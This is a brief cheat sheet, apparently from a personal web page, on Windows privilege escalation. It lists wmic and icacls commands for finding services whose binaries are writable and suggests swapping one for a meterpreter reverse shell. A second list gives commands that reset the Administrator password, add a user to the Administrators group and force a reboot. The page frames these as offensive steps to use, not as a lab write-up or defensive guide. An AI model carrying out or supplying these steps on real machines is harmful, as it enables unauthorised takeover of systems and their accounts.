legal contact
 

Windows priviledge escalation -1-

  • wmic SERVICE get Name,PathName (Find a system services we might be able to use for priviledge escalation )
  • icacls "[full path to above gathered custom service] (Check if you have RW/WR/EX right on the file )

Replace the service file with something "more usefull" i.e. a meterpreter reverse shell.  :-)

Win local stuff

net user Administrator [new password]

net localgroup Administrators [username] /add

SetPassword [account-username] [new-password] [old-password]

schtasks.exe /?

devcon.exe /?

shutdown /r /t 0